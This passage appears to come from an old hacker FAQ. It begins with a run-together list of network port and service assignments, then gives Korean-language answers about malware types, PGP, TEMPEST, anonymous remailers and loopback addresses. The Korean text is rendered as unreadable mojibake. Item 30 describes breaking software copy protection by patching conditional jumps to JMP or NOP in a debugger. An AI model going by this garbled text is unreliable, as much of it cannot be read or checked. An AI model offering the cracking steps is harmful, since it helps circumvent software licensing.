SNMPTRAP snmptrap 162/udp SNMPTRAP cmip-man 163/tcp CMIP/TCP Manager cmip-man 163/udp CMIP/TCP Manager cmip-agent 164/tcp CMIP/TCP Agent smip-agent 164/udp CMIP/TCP Agent xns-courier 165/tcp Xerox xns-courier 165/udp Xerox s-net 166/tcp Sirius Systems s-net 166/udp Sirius Systems namp 167/tcp NAMP namp 167/udp NAMP rsvd 168/tcp RSVD rsvd 168/udp RSVD send 169/tcp SEND send 169/udp SEND print-srv 170/tcp Network PostScript print-srv 170/udp Network PostScript multiplex 171/tcp Network Innovations Multiplex multiplex 171/udp Network Innovations Multiplex cl/1 172/tcp Network Innovations CL/1 cl/1 172/udp Network Innovations CL/1 xyplex-mux 173/tcp Xyplex xyplex-mux 173/udp Xyplex mailq 174/tcp MAILQ mailq 174/udp MAILQ vmnet 175/tcp VMNET vmnet 175/udp VMNET genrad-mux 176/tcp GENRAD-MUX genrad-mux 176/udp GENRAD-MUX xdmcp 177/tcp X Display Manager Control Protocol xdmcp 177/udp X Display Manager Control Protocol nextstep 178/tcp NextStep Window Server NextStep 178/udp NextStep Window Server bgp 179/tcp Border Gateway Protocol bgp 179/udp Border Gateway Protocol ris 180/tcp Intergraph ris 180/udp Intergraph unify 181/tcp Unify unify 181/udp Unify audit 182/tcp Unisys Audit SITP audit 182/udp Unisys Audit SITP ocbinder 183/tcp OCBinder ocbinder 183/udp OCBinder ocserver 184/tcp OCServer ocserver 184/udp OCServer remote-kis 185/tcp Remote-KIS remote-kis 185/udp Remote-KIS kis 186/tcp KIS Protocol kis 186/udp KIS Protocol aci 187/tcp Application Communication Interface aci 187/udp Application Communication Interface mumps 188/tcp Plus Five's MUMPS mumps 188/udp Plus Five's MUMPS qft 189/tcp Queued File Transport qft 189/udp Queued File Transport gacp 190/tcp Gateway Access Control Protocol cacp 190/udp Gateway Access Control Protocol prospero 191/tcp Prospero prospero 191/udp Prospero osu-nms 192/tcp OSU Network Monitoring System osu-nms 192/udp OSU Network Monitoring System srmp 193/tcp Spider Remote Monitoring Protocol srmp 193/udp Spider Remote Monitoring Protocol irc 194/tcp Internet Relay Chat Protocol irc 194/udp Internet Relay Chat Protocol dn6-nlm-aud 195/tcp DNSIX Network Level Module Audit dn6-nlm-aud 195/udp DNSIX Network Level Module Audit dn6-smm-red 196/tcp DNSIX Session Mgt Module Audit Redir dn6-smm-red 196/udp DNSIX Session Mgt Module Audit Redir dls 197/tcp Directory Location Service dls 197/udp Directory Location Service dls-mon 198/tcp Directory Location Service Monitor dls-mon 198/udp Directory Location Service Monitor smux 199/tcp SMUX smux 199/udp SMUX src 200/tcp IBM System Resource Controller src 200/udp IBM System Resource Controller at-rtmp 201/tcp AppleTalk Routing Maintenance at-rtmp 201/udp AppleTalk Routing Maintenance at-nbp 202/tcp AppleTalk Name Binding at-nbp 202/udp AppleTalk Name Binding at-3 203/tcp AppleTalk Unused at-3 203/udp AppleTalk Unused at-echo 204/tcp AppleTalk Echo at-echo 204/udp AppleTalk Echo at-5 205/tcp AppleTalk Unused at-5 205/udp AppleTalk Unused at-zis 206/tcp AppleTalk Zone Information at-zis 206/udp AppleTalk Zone Information at-7 207/tcp AppleTalk Unused at-7 207/udp AppleTalk Unused at-8 208/tcp AppleTalk Unused at-8 208/udp AppleTalk Unused tam 209/tcp Trivial Authenticated Mail Protocol tam 209/udp Trivial Authenticated Mail Protocol z39.50 210/tcp ANSI Z39.50 z39.50 210/udp ANSI Z39.50 914c/g 211/tcp Texas Instruments 914C/G Terminal 914c/g 211/udp Texas Instruments 914C/G Terminal anet 212/tcp ATEXSSTR anet 212/udp ATEXSSTR ipx 213/tcp IPX ipx 213/udp IPX vmpwscs 214/tcp VM PWSCS vmpwscs 214/udp VM PWSCS softpc 215/tcp Insignia Solutions softpc 215/udp Insignia Solutions atls 216/tcp Access Technology License Server atls 216/udp Access Technology License Server dbase 217/tcp dBASE Unix dbase 217/udp dBASE Unix mpp 218/tcp Netix Message Posting Protocol mpp 218/udp Netix Message Posting Protocol uarps 219/tcp Unisys ARPs uarps 219/udp Unisys ARPs imap3 220/tcp Interactive Mail Access Protocol v3 imap3 220/udp Interactive Mail Access Protocol v3 fln-spx 221/tcp Berkeley rlogind with SPX auth fln-spx 221/udp Berkeley rlogind with SPX auth fsh-spx 222/tcp Berkeley rshd with SPX auth fsh-spx 222/udp Berkeley rshd with SPX auth cdc 223/tcp Certificate Distribution Center cdc 223/udp Certificate Distribution Center 224-241 Reserved sur-meas 243/tcp Survey Measurement sur-meas 243/udp Survey Measurement link 245/tcp LINK link 245/udp LINK dsp3270 246/tcp Display Systems Protocol dsp3270 246/udp Display Systems Protocol 247-255 Reserved pawserv 345/tcp Perf Analysis Workbench pawserv 345/udp Perf Analysis Workbench zserv 346/tcp Zebra server zserv 346/udp Zebra server fatserv 347/tcp Fatmen Server fatserv 347/udp Fatmen Server clearcase 371/tcp Clearcase clearcase 371/udp Clearcase ulistserv 372/tcp Unix Listserv ulistserv 372/udp Unix Listserv legent-1 373/tcp Legent Corporation legent-1 373/udp Legent Corporation legent-2 374/tcp Legent Corporation legent-2 374/udp Legent Corporation exec 512/tcp remote process execution; authentication performed using passwords and UNIX login names biff 512/udp used by mail system to notify users of new mail received; currently receives messages only from processes on the same machine login 513/tcp remote login a la telnet; automatic authentication performed based on priviledged port numbers and distributed data bases which identify "authentication domains" who 513/udp maintains data bases showing who's logged in to machines on a local net and the load average of the machine cmd 514/tcp like exec, but automatic authentication is performed as for login server syslog 514/udp printer 515/tcp spooler printer 515/udp spooler talk 517/tcp like tenex link, but across machine - unfortunately, doesn't use link protocol (this is actually just a rendezvous port from which a tcp connection is established) talk 517/udp like tenex link, but across machine - unfortunately, doesn't use link protocol (this is actually just a rendezvous port from which a tcp connection is established) ntalk 518/tcp ntalk 518/udp utime 519/tcp unixtime utime 519/udp unixtime efs 520/tcp extended file name server router 520/udp local routing process (on site); uses variant of Xerox NS routing information protocol timed 525/tcp timeserver timed 525/udp timeserver tempo 526/tcp newdate tempo 526/udp newdate courier 530/tcp rpc courier 530/udp rpc conference 531/tcp chat conference 531/udp chat netnews 532/tcp readnews netnews 532/udp readnews netwall 533/tcp for emergency broadcasts netwall 533/udp for emergency broadcasts uucp 540/tcp uucpd uucp 540/udp uucpd klogin 543/tcp klogin 543/udp kshell 544/tcp krcmd kshell 544/udp krcmd new-rwho 550/tcp new-who new-rwho 550/udp new-who dsf 555/tcp dsf 555/udp remotefs 556/tcp rfs server remotefs 556/udp rfs server rmonitor 560/tcp rmonitord rmonitor 560/udp rmonitord monitor 561/tcp monitor 561/udp chshell 562/tcp chcmd chshell 562/udp chcmd 9pfs 564/tcp plan 9 file service 9pfs 564/udp plan 9 file service whoami 565/tcp whoami whoami 565/udp whoami meter 570/tcp demon meter 570/udp demon meter 571/tcp udemon meter 571/udp udemon ipcserver 600/tcp Sun IPC server ipcserver 600/udp Sun IPC server nqs 607/tcp nqs nqs 607/udp nqs mdqs 666/tcp mdqs 666/udp elcsd 704/tcp errlog copy/server daemon elcsd 704/udp errlog copy/server daemon netcp 740/tcp NETscout Control Protocol netcp 740/udp NETscout Control Protocol netgw 741/tcp netGW netgw 741/udp netGW netrcs 742/tcp Network based Rev. Cont. Sys. netrcs 742/udp Network based Rev. Cont. Sys. flexlm 744/tcp Flexible License Manager flexlm 744/udp Flexible License Manager fujitsu-dev 747/tcp Fujitsu Device Control fujitsu-dev 747/udp Fujitsu Device Control ris-cm 748/tcp Russell Info Sci Calendar Manager ris-cm 748/udp Russell Info Sci Calendar Manager kerberos-adm 749/tcp kerberos administration kerberos-adm 749/udp kerberos administration rfile 750/tcp loadav 750/udp pump 751/tcp pump 751/udp qrh 752/tcp qrh 752/udp rrh 753/tcp rrh 753/udp tell 754/tcp send tell 754/udp send nlogin 758/tcp nlogin 758/udp con 759/tcp con 759/udp ns 760/tcp ns 760/udp rxe 761/tcp rxe 761/udp quotad 762/tcp quotad 762/udp cycleserv 763/tcp cycleserv 763/udp omserv 764/tcp omserv 764/udp webster 765/tcp webster 765/udp phonebook 767/tcp phone phonebook 767/udp phone vid 769/tcp vid 769/udp cadlock 770/tcp cadlock 770/udp rtip 771/tcp rtip 771/udp cycleserv2 772/tcp cycleserv2 772/udp submit 773/tcp notify 773/udp rpasswd 774/tcp acmaint_dbd 774/udp entomb 775/tcp acmaint_transd 775/udp wpages 776/tcp wpages 776/udp wpgs 780/tcp wpgs 780/udp hp-collector 781/tcp hp performance data collector hp-collector 781/udp hp performance data collector hp-managed-node 782/tcp hp performance data managed node hp-managed-node 782/udp hp performance data managed node hp-alarm-mgr 783/tcp hp performance data alarm manager hp-alarm-mgr 783/udp hp performance data alarm manager mdbs_daemon 800/tcp mdbs_daemon 800/udp device 801/tcp device 801/udp xtreelic 996/tcp XTREE License Server xtreelic 996/udp XTREE License Server maitrd 997/tcp maitrd 997/udp busboy 998/tcp puparp 998/udp garcon 999/tcp applix 999/udp Applix ac puprouter 999/tcp puprouter 999/udp cadlock 1000/tcp ock 1000/udp blackjack 1025/tcp network blackjack blackjack 1025/udp network blackjack hermes 1248/tcp hermes 1248/udp bbn-mmc 1347/tcp multi media conferencing bbn-mmc 1347/udp multi media conferencing bbn-mmx 1348/tcp multi media conferencing bbn-mmx 1348/udp multi media conferencing sbook 1349/tcp Registration Network Protocol sbook 1349/udp Registration Network Protocol editbench 1350/tcp Registration Network Protocol editbench 1350/udp Registration Network Protocol equationbuilder 1351/tcp Digital Tool Works (MIT) equationbuilder 1351/udp Digital Tool Works (MIT) lotusnote 1352/tcp Lotus Note lotusnote 1352/udp Lotus Note ingreslock 1524/tcp ingres ingreslock 1524/udp ingres orasrv 1525/tcp oracle orasrv 1525/udp oracle prospero-np 1525/tcp prospero non-privileged prospero-np 1525/udp prospero non-privileged tlisrv 1527/tcp oracle tlisrv 1527/udp oracle coauthor 1529/tcp oracle coauthor 1529/udp oracle issd 1600/tcp issd 1600/udp nkd 1650/tcp nkd 1650/udp callbook 2000/tcp callbook 2000/udp dc 2001/tcp wizard 2001/udp curry globe 2002/tcp globe 2002/udp mailbox 2004/tcp emce 2004/udp CCWS mm conf berknet 2005/tcp oracle 2005/udp invokator 2006/tcp raid-cc 2006/udp raid dectalk 2007/tcp raid-am 2007/udp conf 2008/tcp terminaldb 2008/udp news 2009/tcp whosockami 2009/udp search 2010/tcp pipe_server 2010/udp raid-cc 2011/tcp raid servserv 2011/udp ttyinfo 2012/tcp raid-ac 2012/udp raid-am 2013/tcp raid-cd 2013/udp troff 2014/tcp raid-sf 2014/udp cypress 2015/tcp raid-cs 2015/udp bootserver 2016/tcp bootserver 2016/udp cypress-stat 2017/tcp bootclient 2017/udp terminaldb 2018/tcp rellpack 2018/udp whosockami 2019/tcp about 2019/udp xinupageserver 2020/tcp xinupageserver 2020/udp servexec 2021/tcp xinuexpansion1 2021/udp down 2022/tcp xinuexpansion2 2022/udp xinuexpansion3 2023/tcp xinuexpansion3 2023/udp xinuexpansion4 2024/tcp xinuexpansion4 2024/udp ellpack 2025/tcp xribs 2025/udp scrabble 2026/tcp scrabble 2026/udp shadowserver 2027/tcp shadowserver 2027/udp submitserver 2028/tcp submitserver 2028/udp device2 2030/tcp device2 2030/udp blackboard 2032/tcp blackboard 2032/udp glogger 2033/tcp glogger 2033/udp scoremgr 2034/tcp scoremgr 2034/udp imsldoc 2035/tcp imsldoc 2035/udp objectmanager 2038/tcp objectmanager 2038/udp lam 2040/tcp lam 2040/udp interbase 2041/tcp interbase 2041/udp isis 2042/tcp isis 2042/udp isis-bcast 2043/tcp isis-bcast 2043/udp rimsl 2044/tcp rimsl 2044/udp cdfunc 2045/tcp cdfunc 2045/udp sdfunc 2046/tcp sdfunc 2046/udp dls 2047/tcp dls 2047/udp dls-monitor 2048/tcp dls-monitor 2048/udp shilp 2049/tcp shilp 2049/udp www-dev 2784/tcp world wide web - development www-dev 2784/udp world wide web - development NSWS 3049/tcp NSWS 3049/ddddp rfa 4672/tcp remote file access server rfa 4672/udp remote file access server commplex-main 5000/tcp commplex-main 5000/udp commplex-link 5001/tcp commplex-link 5001/udp rfe 5002/tcp radio free ethernet rfe 5002/udp radio free ethernet rmonitor_secure 5145/tcp rmonitor_secure 5145/udp padl2sim 5236/tcp padl2sim 5236/udp sub-process 6111/tcp HP SoftBench Sub-Process Control sub-process 6111/udp HP SoftBench Sub-Process Control xdsxdm 6558/udp xdsxdm 6558/tcp afs3-fileserver 7000/tcp file server itself afs3-fileserver 7000/udp file server itself afs3-callback 7001/tcp callbacks to cache managers afs3-callback 7001/udp callbacks to cache managers afs3-prserver 7002/tcp users & groups database afs3-prserver 7002/udp users & groups database afs3-vlserver 7003/tcp volume location database afs3-vlserver 7003/udp volume location database afs3-kaserver 7004/tcp AFS/Kerberos authentication service afs3-kaserver 7004/udp AFS/Kerberos authentication service afs3-volser 7005/tcp volume managment server afs3-volser 7005/udp volume managment server afs3-errors 7006/tcp error interpretation service afs3-errors 7006/udp error interpretation service afs3-bos 7007/tcp basic overseer process afs3-bos 7007/udp basic overseer process afs3-update 7008/tcp server-to-server updater afs3-update 7008/udp server-to-server updater afs3-rmtsys 7009/tcp remote cache manager service afs3-rmtsys 7009/udp remote cache manager service man 9535/tcp man 9535/udp isode-dua 17007/tcp isode-dua 17007/udp 23.Æ®·ÎÀ̸ñ¸¶,¿ú,¹ÙÀÌ·¯½º,·Î±×bomb´Â ¹«¾ùÀΰ¡? TROJAN À¯¿ëÇÑ ±â´ÉÀ» ÇÏ´Â ÇÁ·Î±×·¥Ã³·³ º¸ÀÌÁö¸¸ ³»ºÎÀûÀ¸·Î´Â ¶Ç ´Ù¸¥ ÇÁ·Î±×·¥ÀÌ ¼û¾îÀÖ ´Â ÇÁ·Î±×·¥À» ÀǹÌÇÑ´Ù. »ç¿ëÀÚ°¡ ÀÌ ÇÁ·Î±×·¥À» »ç¿ëÇÒ °æ¿ì,Æ®·ÎÀÌÀÇ ¸ñ¸¶´Â ºñ¹Ð¸®¿¡ ¶Ç ´Ù¸¥ ¼û°ÜÁø ±â´ÉÀ» ¼öÇàÇÑ´Ù.(¿¹¸¦ µé¾î »ç¿ëÀÚÀÇ ±ÇÇÑÀ» Áõ°¡½ÃÅ°´Â ±â´É µî) VIRUS ÀÌ°ÍÀº µ¶¸³ÀûÀÎ ÇÁ·Î±×·¥ÀÌ ¾Æ´Ï¶ó ÇÁ·Î±×·¥¿¡ ºÙ¾îÀÖ´Â ÀÏÁ¾ÀÇ ÄÚµåÀÌ´Ù. ¿©·¯ °³ÀÇ ÇÁ·Î±×·¥À¸·Î °¨¿°ÀÌ µÇ¾î Àڷḣ Æı«Çϰųª,½Ã½ºÅÛÀÇ ¼º´ÉÀ» ÀúÇϽÃŲ´Ù. WORM ³×Æ®¿öÅ©¿¡ ¿¬°áµÇ¾î ÀÖ´Â ¿©·¯ ½Ã½ºÅÛÀ» °¨¿°½ÃÅ´À¸·Î½á,¹ÙÀÌ·¯½ºÃ³·³ ÀڷḦ Æı« Çϰųª,½Ã½ºÅÛÀÇ ¼º´ÉÀ» ÀúÇϽÃÅ°´Â µ¶¸³ÀûÀÎ ÇÁ·Î±×·¥ÀÌ´Ù.½ÉÁö¾î´Â ½Ã½ºÅÛÀ» ºÎÆýÃÅ°±âµµ ÇÑ ´Ù. LOGIC BOMB ½Ã½ºÅÛÀ» Æı«ÇÏ´Â ´Ù¾çÇÑ Á¾·ùÀÇ ¹æ¹ýÀ» ÀǹÌÇÑ´Ù. Ưº°ÇÑ Á¶°Ç(¾î¶² ³¯ÀÚ¶óµç Áö,Ưº°ÇÑ ±â´ÉÀÌ ¼öÇàµÉ ¶§)ÀÌ ¸¸Á·µÇ¸é ½Ã½ºÅÛ Æı«°¡ ¼öÇàµÈ´Ù.(Æ÷¸ËÀ̳ª µ¥ÀÌŸ »èÁ¦ µîµî) 24.¹ÙÀÌ·¯½º·ÎºÎÅÍ ¾î¶»°Ô ³ªÀÚ½ÅÀ» Áöų°ÍÀΰ¡? Ç÷ÎÇÇ µð½ºÄÏÀÇ °æ¿ì,¾²±â ±â´ÉÀÌ ÇÊ¿ä ¾øÀ» ¶§´Â Ç×»ó ¾²±â ¹æÁö ±â´ÉÀ» »ç¿ëÇÑ´Ù. ½ÇÇà ÆÄÀÏÀÇ °æ¿ì(ÆÄÀÏ È®ÀåÀÚ°¡ COMÀ̳ª EXE),ÆÄÀÏ ¼Ó¼ºÀ» Àбâ Àü¿ëÀ¸·Î ¼³Á¤ÇØ ³õ´Â´Ù. ¾û ¼ºÇÏ°Ô ¸¸µé¾îÁø ¹ÙÀÌ·¯½ººÎÅÍ ÆÄÀÏÀ» º¸È£ÇÒ ¼ö ÀÖÁö¸¸ ÃæºÐÇÑ ¹æ¹ýÀº ¾Æ´Ï´Ù. ÃÖ½ÅÀÇ ¹ÙÀÌ·¯½º ¹é½ÅÀ» ÀÌ¿ëÇÏ¿© ÀڷḦ Ç×»ó °Ë»öÇÑ´Ù. ÁÖ±âÀûÀ¸·Î ¹é¾÷À» ÇÑ´Ù. 25.Cryptoxxxxxxx¶õ ¹«¾ùÀΰ¡? ÀϹÝÀûÀÎ ¸Þ¼¼Áö´Â plaintext³ª cleartext¶ó°í ÇÑ´Ù. ÀÌ·± ¸Þ¼¼ÁöÀÇ ³»¿ëÀ» º¸Áö ¸øÇϵµ·Ï ¾ÏȣȭÇÏ ´Â ¹æ¹ýÀ» encryptionÀ̶ó°í Çϸç,ÀÌ·¸°Ô ¾ÏȣȭµÈ ¸Þ¼¼Áö´Â ciphertext¶ó°í ºÒ¸®¿î´Ù.ciphertext¸¦ ¿ø·¡ÀÇ plaintext·Î µÇµ¹¸®´Â ¹æ¹ýÀº decryptionÀ̶ó°í ÇÑ´Ù. ¸Þ¼¼Áö¸¦ º¸È£ÇÏ´Â ¹æ¹ýÀº ¿©·¯ °¡Áö °¡ ÀÖÀ¸¸ç,±×·± ¹æ¹ýµéÀ» ÃÑĪÇÏ¿© cryptography¶ó°í ÇÑ´Ù. 26.PGP¶õ ¹«¾ùÀΰ¡? PGP SMS e-mail°ú ÀÚ·á ÆÄÀÏÀ» º¸È£Çϱâ À§ÇÏ¿© public-key encryptionÀ» »ç¿ëÇϹǷÎ,»çÀü¿¡ Å° ·ê ±³È¯ÇÒ ÇÊ¿ä ¾øÀÌ ¾ÈÀüÇÑ Ã¤³ÎÀ» ÅëÇØ Ã³À½º¸´Â »ç¶÷°úµµ Åë½ÅÀ» ÇÒ ¼ö °¡ÀÖ´Ù.PGP´Â º¹ÀâÇÑ Å°°ü¸®,Æнº¿öµå,ÀÚ·á¾ÐÃàÀÌ °¡´ÉÇϸç Àΰ£°øÇÐÀûÀ¸·Î ¼³°èµÇ¾î ÀÖ´Ù. Phil's Pretty Good Software¿¡¼­ °³¹ßÇÑ Pretty Good(tm) Privacy (PGP)´Â MS-DOS, Unix,VAX/VMS, ÀÌ¿ÜÀÇ ¿©·¯½Ã½ºÅÛÀ» À§ÇÑ °íµµÀÇ ¾Ïȣȭ ÀÀ¿ë ÇÁ·Î±×·¥ÀÌ´Ù. PGP¸¦ »ç¿ëÇÏ¿© ÆÄÀÏÀ̳ª ¸Þ¼¼Áö¸¦ ±³È¯ÇÏ´Â °æ¿ì,ÀÚ·áÀÇ º¸¾ÈÀ» À§ÇÏ¿© ¼¼°¡ÁöÀÇ Æ¯Â¡À» »ç¿ëÇÑ ´Ù. 1.¸Þ¼¼Áö¸¦ ¼ö½ÅÇÏ´Â »ç¶÷ ¿Ü¿¡´Â ³»¿ëÀ» º¼ ¼ö ¾ø´Ù. 2.¸Þ¼¼Áö¿¡ ÀûÇô ÀÖ´Â º¸³»´Â »ç¶÷ À̸§ÀÌ Á¤È®È÷ ¼Û½ÅÀΰú ÀÏÄ¡ÇØ¾ß ÇÑ´Ù. Áï ´Ù¸¥ »ç¶÷ À̸§À¸·Î´Â ¸Þ¼¼Áö¸¦ º¸³¾ ¼ö°¡ ¾ø´Ù. 3.À§ÀÇ µÎ°¡Áö Ư¡ÀÌ ÇÁ·Î±×·¥¿¡ ¿¬°áµÈ Å°ÀÇ Ãæµ¹¾øÀÌ Æí¸®ÇÏ°Ô Á¦°øµÈ´Ù. ¾ÈÀüÇÑ Ã¤³ÎÀ» À§ÇØ ¼­ »ç¿ëÀÚµé »çÀÌ¿¡ Å°¸¦ ±³È¯ÇÒ ÇÊ¿ä´Â ¾øÀ¸¹Ç·Î »ç¿ëÀÌ ¸Å¿ì Æí¸®ÇÏ´Ù. ÀÌ°ÍÀº PGP°¡ 'public key cryptography'¶ó°í ºÒ¸®À¯´« »õ·Ó°í °­·ÂÇÑ ±â¼úÀ» »ç¿ëÇϱ⠶§¹®¿¡ °¡´ÉÇÏ´Ù. 27.ÅÛÆ佺Ʈ¶õ ¹«¾ùÀΰ¡? Tempest´Â Transient Electromagnetic Pulse Surveillance Technology¸¦ ÀǹÌÇÑ´Ù. ÄÄÇ»ÅÍ¿Í °°Àº ÀüÀÚ Àåºñ´Â ÁÖº¯¿¡ ÀüÀÚÆĸ¦ ¹æÃâÇÑ´Ù. ÀÌ°ÍÀº µÎ°³ÀÇ ¸ð´ÏÅ͸¦ °¡±îÀÌ À§Ä¡½ÃÅ´ À¸·Î½á ½±°Ô È®ÀÎÇÒ ¼ö°¡ ÀÖ´Ù. ¸ð´ÏÅ͸¦ ¸Ö¸® ºÐ¸®½ÃÄѳõÀ» ¶§±îÁö È­¸éÀÌ ºÒ±ÔÄ¢ÇÏ°Ô ³ªÅ¸³ª´Â °ÍÀ» º¼ ¼ö°¡ ÀÖ´Ù. ´ëºÎºÐÀÇ °æ¿ì ÀÌ·± ÀüÀÚÆÄ´Â ¾ÆÁÖ ¾È ÁÁÀº °ÍÀÌÁö¸¸ °¡²ûÀº À¯¿ëÇÑ °æ¿ì°¡ ÀÖ´Ù. °æÀïȸ»ç¿¡¼­ ¾î¶² ÇÁ·ÎÁ§Æ®°¡ ÁøÇàÁßÀΰ¡ ¾Ë±â ¿øÇÑ´Ù°í °¡Á¤ÇÏÀÚ. »ç¹«½Ç ¹Û¿¡ ÀÖ´Â ÀÚµ¿Â÷¿¡¼­ »ç¹«½Ç ³»¿¡ ÀÖ´Â ¸ð´ÏÅÍ¿¡¼­ ³ª¿À´Â ÀüÀÚÆĸ¦ Àâ¾Æ Çص¶ÇÏ´Â ÀüÀÚ Àåºñ¸¦ »ç¿ëÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù. ±×·¯³ª °æÀïȸ»ç´Â ¸ð´ÏÅÍ¿¡¼­ ³ª¿À´Â ÀüÀÚÂ÷¸¦ Â÷´ÜÇϰųª ÀüÀÚ ÆÄ°¡ ¹ß»ýÇÏÁö ¾Ê´Â Àåºñ¸¦ »ç¿ëÇÒ¼öµµ ÀÖ´Ù. TEMPEST´Â µµÃ»À¸·ÎºÎÅÍ ¾ÈÀüÇÑ ÀüÀÚ ÀåºñÀÇ Æò°¡¿Í º¸ÁõÀ» À§ÇÑ ¹ÌÁ¤ºÎ ÇÁ·Î±×·¥ÀÌ´Ù. 28.À͸íÀÇ ÆíÁö¸¦ º¸³»ÀÚ. anonymous remailer¶õ À͸íÀ¸·Î e-mailÀ» º¸³»°Å³ª usenet¿¡ ¸Þ¼¼Áö¸¦ ¹ß¼ÛÇÏ°Ô ÇØÁÖ´Â ÀÎÅͳݻó ÀÇ ½Ã½ºÅÛÀ» ¸»ÇÑ´Ù. remailer site¿¡¼­ À͸íÀÇ °èÁ¸¦ ÅëÇØ ¸Þ¼¼Áö¸¦ ¹ß¼ÛÇϸé, ±× ¸Þ¼¼Áö¸¦ ÀÐÀº ¾î´À ´©±¸µµ ¹ß½Å ÀÎÀÇ ½ÇÁ¦ ¾ÆÀ̵ð¿Í host¸íÀ» ¾Ë ¼ö°¡ ¾ø´Â °ÍÀÌ´Ù. 29.Anonymouse remailerÀÇ ÁÖ¼Ò´Â? °¡Àå ÀϹÝÀûÀÌ°í ¾ÈÁ¤ÀûÀÎ anonymous remailer´Â johan Helsingus°¡ ¿î¿µÇÏ´Â anon.penet.fiÀÌ ´Ù. À͸íÀÇ ID¸¦ ¾òÀ¸·Á¸é ping@anon.penet.fi·Î ¸ÞÀÏÀ» º¸³»¸é µÈ´Ù. ¿ì¸®°¡ anonymous REMAILERÀÇ ¸ñ·ÏÀ» º¸·Á°í ÇÑ´Ù¸é,FINGER¸í·ÉÀ» ÀÌ¿ëÇÏ¿© remailer-list@kiwi.cs.berkeley.edu¸¦ °Ë»öÇÏ¸é µÈ´Ù. 30.¾î¶»°Ô º¹»ç ¹æÁöÀåÄ¡¸¦ ±ú¶ß¸±°ÍÀΰ¡? º¹»ç¹æÁöÀåÄ¡¸¦ ±ú¶ß¸®´Â µÎ°¡Áö ¹æ¹ýÀÌ Àִµ¥,ù¹ø°´Â º¹»ç ¹æÁö ÀåÄ¡¸¦ Á¦°ÅÇÏ´Â ÇÁ·Î±×·¥À» »ç¿ëÇÏ´Â °ÍÀÌ´Ù. ÀÌ·± ¸ñÀûÀ¸·Î ¸¸µé¾îÁø ÇÁ·Î±×·¥¿¡´Â Central Point Software»ç¿¡¼­ °³¹ßÇÑ CopyIIPC¿Í Quaid software¿¡¼­ ³ª¿Â copy write°¡ ÀÖ´Ù. µÎ¹ø° ¹æ¹ýÀº º¹»ç ¹æÁöµÈ ÇÁ·Î±×·¥À» Á÷Á¢ ÆÐÄ¡ÇÏ´Â °ÍÀÌ´Ù. ¸¹ÀÌ ¾Ë·ÁÁø ÇÁ·Î±×·¥ÀÇ °æ¿ì ÆÐÄ¡ ¸Þ´º¾óÀ» ½±°Ô ±¸ÇÒ ¼ö°¡ ÀÖÀ¸¸ç,debug³ª ³ëÅÏÀ¯Æ¿¸®Æ¼ÀÇ diskedit¸¦ ÀÌ¿ëÇÏ¿© ÆÐÄ¡ÇÒ ¼ö ÀÖ´Ù. ±×·¸Áö ¾ÊÀ» °æ¿ì´Â ÀÚ½ÅÀÌ Á÷Á¢ ÆÐÄ¡ÇØ¾ß ÇÑ´Ù. ¹°·Ð ½± Áö°¡ ¾ÊÀ» °ÍÀÌ´Ù. ¾î¼Àºí¸®¿¡ °üÇÑ Áö½ÄÀ» °¡Áö°í ÀÖ´Ù¸é debugger³ª sourcer¿Í °°Àº ¿ª¾î¼Àºí ¸µ ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ¿© Á÷Á¢ ÆÐÄ¡¸¦ ÇÒ ¼ö°¡ ÀÖ´Ù. µð¹ö°Å¿Í ÇÔ°Ô º¹»ç ¹æÁöµÈ ÇÁ·Î±×·¥À» ½ÇÇà ½ÃÄѼ­ º¹»ç ¹æÁö ¸ÞÄ«´ÏÁòÀ» »ìÇǵµ·Ï ÇÑ´Ù. ´ë·«ÀûÀÎ º¹»ç ¹æÁö ¸ÞÄ«´ÏÁòÀÌ ÆľÇÀÌ µÇ¸é ÄÚµå ¸¦ º¯°æÇÑ´Ù. JE (Jump on Equal) À̳ª JNE (Jump On Not Equal) ¿Í °°Àº Äڵ带 JMP (Jump Unconditionally) ·Î ¹Ù²Ù°Å³ª NOP (No Operation) À¸·Î ¹Ù²ãº¸´Â °ÍÀÌ ÁÁ´Ù. 31.127.0.0.1´Â ¹«¾ùÀΰ¡? 127.0.0.1Àº loopback network connectionÀÌ´Ù. Áï telnetÀ̳ª ftp¸¦ ÀÌ¿ëÇÏ¿© ÀÌ°÷¿¡ Á¢¼ÓÇϸé ÀÚ ±â Àڽſ¡°Ô Á¢¼ÓÇÏ°Ô µÇ´Â °ÍÀÌ´Ù.